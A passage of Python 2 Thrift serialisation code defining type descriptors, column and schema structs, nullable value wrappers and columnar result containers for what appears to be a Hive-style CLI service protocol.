   - unionEntry
   - userDefinedTypeEntry
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'primitiveEntry', (TPrimitiveTypeEntry, TPrimitiveTypeEntry.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'arrayEntry', (TArrayTypeEntry, TArrayTypeEntry.thrift_spec), None, ), # 2
    (3, TType.STRUCT, 'mapEntry', (TMapTypeEntry, TMapTypeEntry.thrift_spec), None, ), # 3
    (4, TType.STRUCT, 'structEntry', (TStructTypeEntry, TStructTypeEntry.thrift_spec), None, ), # 4
    (5, TType.STRUCT, 'unionEntry', (TUnionTypeEntry, TUnionTypeEntry.thrift_spec), None, ), # 5
    (6, TType.STRUCT, 'userDefinedTypeEntry', (TUserDefinedTypeEntry, TUserDefinedTypeEntry.thrift_spec), None, ), # 6
  )

  def __init__(self, primitiveEntry=None, arrayEntry=None, mapEntry=None, structEntry=None, unionEntry=None, userDefinedTypeEntry=None,):
    self.primitiveEntry = primitiveEntry
    self.arrayEntry = arrayEntry
    self.mapEntry = mapEntry
    self.structEntry = structEntry
    self.unionEntry = unionEntry
    self.userDefinedTypeEntry = userDefinedTypeEntry

  def read(self, iprot):
    # fast path via the C extension when available
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.primitiveEntry = TPrimitiveTypeEntry()
          self.primitiveEntry.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.arrayEntry = TArrayTypeEntry()
          self.arrayEntry.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.mapEntry = TMapTypeEntry()
          self.mapEntry.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.STRUCT:
          self.structEntry = TStructTypeEntry()
          self.structEntry.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.STRUCT:
          self.unionEntry = TUnionTypeEntry()
          self.unionEntry.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 6:
        if ftype == TType.STRUCT:
          self.userDefinedTypeEntry = TUserDefinedTypeEntry()
          self.userDefinedTypeEntry.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TTypeEntry')
    if self.primitiveEntry is not None:
      oprot.writeFieldBegin('primitiveEntry', TType.STRUCT, 1)
      self.primitiveEntry.write(oprot)
      oprot.writeFieldEnd()
    if self.arrayEntry is not None:
      oprot.writeFieldBegin('arrayEntry', TType.STRUCT, 2)
      self.arrayEntry.write(oprot)
      oprot.writeFieldEnd()
    if self.mapEntry is not None:
      oprot.writeFieldBegin('mapEntry', TType.STRUCT, 3)
      self.mapEntry.write(oprot)
      oprot.writeFieldEnd()
    if self.structEntry is not None:
      oprot.writeFieldBegin('structEntry', TType.STRUCT, 4)
      self.structEntry.write(oprot)
      oprot.writeFieldEnd()
    if self.unionEntry is not None:
      oprot.writeFieldBegin('unionEntry', TType.STRUCT, 5)
      self.unionEntry.write(oprot)
      oprot.writeFieldEnd()
    if self.userDefinedTypeEntry is not None:
      oprot.writeFieldBegin('userDefinedTypeEntry', TType.STRUCT, 6)
      self.userDefinedTypeEntry.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    return


  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TTypeDesc(object):
  """
  Full type descriptor.

  Attributes:
   - types: flat list of TTypeEntry; the *TypePtr fields in composite
     entries appear to index into this list -- confirm against the IDL
  """

  thrift_spec = (
    None, # 0
    (1, TType.LIST, 'types', (TType.STRUCT,(TTypeEntry, TTypeEntry.thrift_spec)), None, ), # 1
  )

  def __init__(self, types=None,):
    self.types = types

  def read(self, iprot):
    # fast path via the C extension when available
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.LIST:
          self.types = []
          (_etype21, _size18) = iprot.readListBegin()
          for _i22 in xrange(_size18):
            _elem23 = TTypeEntry()
            _elem23.read(iprot)
            self.types.append(_elem23)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TTypeDesc')
    if self.types is not None:
      oprot.writeFieldBegin('types', TType.LIST, 1)
      oprot.writeListBegin(TType.STRUCT, len(self.types))
      for iter24 in self.types:
        iter24.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.types is None:
      raise TProtocol.TProtocolException(message='Required field types is unset!')
    return


  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TColumnDesc(object):
  """
  Description of a single result-set column.

  Attributes:
   - columnName
   - typeDesc: TTypeDesc of the column's type
   - position: ordinal position of the column
   - comment: optional column comment
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'columnName', None, None, ), # 1
    (2, TType.STRUCT, 'typeDesc', (TTypeDesc, TTypeDesc.thrift_spec), None, ), # 2
    (3, TType.I32, 'position', None, None, ), # 3
    (4, TType.STRING, 'comment', None, None, ), # 4
  )

  def __init__(self, columnName=None, typeDesc=None, position=None, comment=None,):
    self.columnName = columnName
    self.typeDesc = typeDesc
    self.position = position
    self.comment = comment

  def read(self, iprot):
    # fast path via the C extension when available
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRING:
          self.columnName = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.typeDesc = TTypeDesc()
          self.typeDesc.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I32:
          self.position = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.STRING:
          self.comment = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TColumnDesc')
    if self.columnName is not None:
      oprot.writeFieldBegin('columnName', TType.STRING, 1)
      oprot.writeString(self.columnName)
      oprot.writeFieldEnd()
    if self.typeDesc is not None:
      oprot.writeFieldBegin('typeDesc', TType.STRUCT, 2)
      self.typeDesc.write(oprot)
      oprot.writeFieldEnd()
    if self.position is not None:
      oprot.writeFieldBegin('position', TType.I32, 3)
      oprot.writeI32(self.position)
      oprot.writeFieldEnd()
    if self.comment is not None:
      oprot.writeFieldBegin('comment', TType.STRING, 4)
      oprot.writeString(self.comment)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.columnName is None:
      raise TProtocol.TProtocolException(message='Required field columnName is unset!')
    if self.typeDesc is None:
      raise TProtocol.TProtocolException(message='Required field typeDesc is unset!')
    if self.position is None:
      raise TProtocol.TProtocolException(message='Required field position is unset!')
    return


  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TTableSchema(object):
  """Schema of a result set: an ordered list of column descriptors.

  Attributes:
   - columns: list of TColumnDesc, one per result column (required)
  """

  thrift_spec = (
    None, # 0
    (1, TType.LIST, 'columns', (TType.STRUCT,(TColumnDesc, TColumnDesc.thrift_spec)), None, ), # 1
  )

  def __init__(self, columns=None,):
    self.columns = columns

  def read(self, iprot):
    # Fast path: delegate decoding to the C extension when the accelerated
    # binary protocol, a readable C transport, and a spec are all available.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.LIST:
        bucket = []
        self.columns = bucket
        (_etype, count) = iprot.readListBegin()
        for _ in xrange(count):
          desc = TColumnDesc()
          desc.read(iprot)
          bucket.append(desc)
        iprot.readListEnd()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: delegate encoding to the C extension when possible.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TTableSchema')
    if self.columns is not None:
      oprot.writeFieldBegin('columns', TType.LIST, 1)
      oprot.writeListBegin(TType.STRUCT, len(self.columns))
      for desc in self.columns:
        desc.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.columns is None:
      raise TProtocol.TProtocolException(message='Required field columns is unset!')
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TBoolValue(object):
  """Wrapper for a nullable BOOLEAN cell value.

  Attributes:
   - value: the wrapped bool, or None for a NULL cell
  """

  thrift_spec = (
    None, # 0
    (1, TType.BOOL, 'value', None, None, ), # 1
  )

  def __init__(self, value=None,):
    self.value = value

  def read(self, iprot):
    # Fast path: use the accelerated C decoder when protocol/transport allow.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.BOOL:
        self.value = iprot.readBool()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: use the accelerated C encoder when available.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TBoolValue')
    if self.value is not None:
      oprot.writeFieldBegin('value', TType.BOOL, 1)
      oprot.writeBool(self.value)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # All fields are optional; nothing to check.
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TByteValue(object):
  """Wrapper for a nullable TINYINT (byte) cell value.

  Attributes:
   - value: the wrapped byte, or None for a NULL cell
  """

  thrift_spec = (
    None, # 0
    (1, TType.BYTE, 'value', None, None, ), # 1
  )

  def __init__(self, value=None,):
    self.value = value

  def read(self, iprot):
    # Fast path: use the accelerated C decoder when protocol/transport allow.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.BYTE:
        self.value = iprot.readByte()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: use the accelerated C encoder when available.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TByteValue')
    if self.value is not None:
      oprot.writeFieldBegin('value', TType.BYTE, 1)
      oprot.writeByte(self.value)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # All fields are optional; nothing to check.
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TI16Value(object):
  """Wrapper for a nullable SMALLINT (16-bit integer) cell value.

  Attributes:
   - value: the wrapped i16, or None for a NULL cell
  """

  thrift_spec = (
    None, # 0
    (1, TType.I16, 'value', None, None, ), # 1
  )

  def __init__(self, value=None,):
    self.value = value

  def read(self, iprot):
    # Fast path: use the accelerated C decoder when protocol/transport allow.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.I16:
        self.value = iprot.readI16()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: use the accelerated C encoder when available.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TI16Value')
    if self.value is not None:
      oprot.writeFieldBegin('value', TType.I16, 1)
      oprot.writeI16(self.value)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # All fields are optional; nothing to check.
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TI32Value(object):
  """Wrapper for a nullable INT (32-bit integer) cell value.

  Attributes:
   - value: the wrapped i32, or None for a NULL cell
  """

  thrift_spec = (
    None, # 0
    (1, TType.I32, 'value', None, None, ), # 1
  )

  def __init__(self, value=None,):
    self.value = value

  def read(self, iprot):
    # Fast path: use the accelerated C decoder when protocol/transport allow.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.I32:
        self.value = iprot.readI32()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: use the accelerated C encoder when available.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TI32Value')
    if self.value is not None:
      oprot.writeFieldBegin('value', TType.I32, 1)
      oprot.writeI32(self.value)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # All fields are optional; nothing to check.
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TI64Value(object):
  """Wrapper for a nullable BIGINT (64-bit integer) cell value.

  Attributes:
   - value: the wrapped i64, or None for a NULL cell
  """

  thrift_spec = (
    None, # 0
    (1, TType.I64, 'value', None, None, ), # 1
  )

  def __init__(self, value=None,):
    self.value = value

  def read(self, iprot):
    # Fast path: use the accelerated C decoder when protocol/transport allow.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.I64:
        self.value = iprot.readI64()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: use the accelerated C encoder when available.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TI64Value')
    if self.value is not None:
      oprot.writeFieldBegin('value', TType.I64, 1)
      oprot.writeI64(self.value)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # All fields are optional; nothing to check.
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TDoubleValue(object):
  """Wrapper for a nullable DOUBLE cell value.

  Attributes:
   - value: the wrapped float, or None for a NULL cell
  """

  thrift_spec = (
    None, # 0
    (1, TType.DOUBLE, 'value', None, None, ), # 1
  )

  def __init__(self, value=None,):
    self.value = value

  def read(self, iprot):
    # Fast path: use the accelerated C decoder when protocol/transport allow.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.DOUBLE:
        self.value = iprot.readDouble()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: use the accelerated C encoder when available.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TDoubleValue')
    if self.value is not None:
      oprot.writeFieldBegin('value', TType.DOUBLE, 1)
      oprot.writeDouble(self.value)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # All fields are optional; nothing to check.
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TStringValue(object):
  """Wrapper for a nullable STRING cell value.

  Attributes:
   - value: the wrapped string, or None for a NULL cell
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'value', None, None, ), # 1
  )

  def __init__(self, value=None,):
    self.value = value

  def read(self, iprot):
    # Fast path: use the accelerated C decoder when protocol/transport allow.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1 and ftype == TType.STRING:
        self.value = iprot.readString()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: use the accelerated C encoder when available.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TStringValue')
    if self.value is not None:
      oprot.writeFieldBegin('value', TType.STRING, 1)
      oprot.writeString(self.value)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # All fields are optional; nothing to check.
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TColumn(object):
  """Columnar result data: a list of typed value wrappers for one column.

  Only the list matching the column's type is expected to be populated;
  the other attributes stay None.

  Attributes:
   - boolColumn
   - byteColumn
   - i16Column
   - i32Column
   - i64Column
   - doubleColumn
   - stringColumn
  """

  thrift_spec = (
    None, # 0
    (1, TType.LIST, 'boolColumn', (TType.STRUCT,(TBoolValue, TBoolValue.thrift_spec)), None, ), # 1
    (2, TType.LIST, 'byteColumn', (TType.STRUCT,(TByteValue, TByteValue.thrift_spec)), None, ), # 2
    (3, TType.LIST, 'i16Column', (TType.STRUCT,(TI16Value, TI16Value.thrift_spec)), None, ), # 3
    (4, TType.LIST, 'i32Column', (TType.STRUCT,(TI32Value, TI32Value.thrift_spec)), None, ), # 4
    (5, TType.LIST, 'i64Column', (TType.STRUCT,(TI64Value, TI64Value.thrift_spec)), None, ), # 5
    (6, TType.LIST, 'doubleColumn', (TType.STRUCT,(TDoubleValue, TDoubleValue.thrift_spec)), None, ), # 6
    (7, TType.LIST, 'stringColumn', (TType.STRUCT,(TStringValue, TStringValue.thrift_spec)), None, ), # 7
  )

  def __init__(self, boolColumn=None, byteColumn=None, i16Column=None, i32Column=None, i64Column=None, doubleColumn=None, stringColumn=None,):
    self.boolColumn = boolColumn
    self.byteColumn = byteColumn
    self.i16Column = i16Column
    self.i32Column = i32Column
    self.i64Column = i64Column
    self.doubleColumn = doubleColumn
    self.stringColumn = stringColumn

  def read(self, iprot):
    # Fast path: delegate decoding to the C extension when possible.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Field id -> (attribute name, element wrapper class). The seven fields
    # share identical list-of-struct decoding, so dispatch through a table.
    field_map = {
      1: ('boolColumn', TBoolValue),
      2: ('byteColumn', TByteValue),
      3: ('i16Column', TI16Value),
      4: ('i32Column', TI32Value),
      5: ('i64Column', TI64Value),
      6: ('doubleColumn', TDoubleValue),
      7: ('stringColumn', TStringValue),
    }
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid in field_map and ftype == TType.LIST:
        attr, elem_cls = field_map[fid]
        bucket = []
        setattr(self, attr, bucket)
        (_etype, count) = iprot.readListBegin()
        for _ in xrange(count):
          elem = elem_cls()
          elem.read(iprot)
          bucket.append(elem)
        iprot.readListEnd()
      else:
        # Unknown or mistyped field: consume and ignore it.
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # Fast path: delegate encoding to the C extension when possible.
    if (oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and self.thrift_spec is not None
        and fastbinary is not None):
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TColumn')
    # Emit each populated list field in field-id order; attribute names match
    # the Thrift field names.
    for fid, attr in ((1, 'boolColumn'), (2, 'byteColumn'), (3, 'i16Column'),
                      (4, 'i32Column'), (5, 'i64Column'), (6, 'doubleColumn'),
                      (7, 'stringColumn')):
      values = getattr(self, attr)
      if values is not None:
        oprot.writeFieldBegin(attr, TType.LIST, fid)
        oprot.writeListBegin(TType.STRUCT, len(values))
        for elem in values:
          elem.write(oprot)
        oprot.writeListEnd()
        oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # All fields are optional; nothing to check.
    return

  def __repr__(self):
    pairs = ['%s=%r' % kv for kv in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(pairs))

  def __eq__(self, other):
    if not isinstance(other, self.__class__):
      return False
    return self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class TColumnValue(object):
  """A single row cell: a union-style struct where at most one of the typed
  value wrappers is set, matching the column's type.

  Attributes:
   - boolVal
   - byteVal
   - i16Val
   - i32Val
   - i64Val
   - doubleVal
   - stringVal
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'boolVal', (TBoolValue, TBoolValue.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'byteVal', (TByteValue, TByteValue.thrift_spec), None, ), # 2
    (3, TType.STRUCT, 'i16Val', (TI16Value, TI16Value.thrift_spec), None, ), # 3
    (4, TType.STRUCT, 'i32Val', (TI32Value, TI32Value.thrift_spec), None, ), # 4
    (5, TType.STRUCT, 'i64Val', (TI64Value, TI64Value.thrift_spec), None, ), # 5
    (6, TType.STRUCT, 'doubleVal', (TDoubleValue, TDoubleValue.thrift_spec), None, ), # 6
    (7, TType.STRUCT, 'stringVal', (TStringValue, TStringValue.thrift_spec), None, ), # 7
  )

  def __init__(self, boolVal=None, byteVal=None, i16Val=None, i32Val=None, i64Val=None, doubleVal=None, stringVal=None,):
    self.boolVal = boolVal
    self.byteVal = byteVal
    self.i16Val = i16Val
    self.i32Val = i32Val
    self.i64Val = i64Val
    self.doubleVal = doubleVal
    self.stringVal = stringVal

  def read(self, iprot):
    # Fast path: delegate decoding to the C extension when possible.
    if (iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated
        and isinstance(iprot.trans, TTransport.CReadableTransport)
        and self.thrift_spec is not None
        and fastbinary is not None):
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Field id -> (attribute name, wrapper class); all seven fields decode
    # identically as nested structs.
    field_map = {
      1: ('boolVal', TBoolValue),
      2: ('byteVal', TByteValue),
      3: ('i16Val', TI16Value),
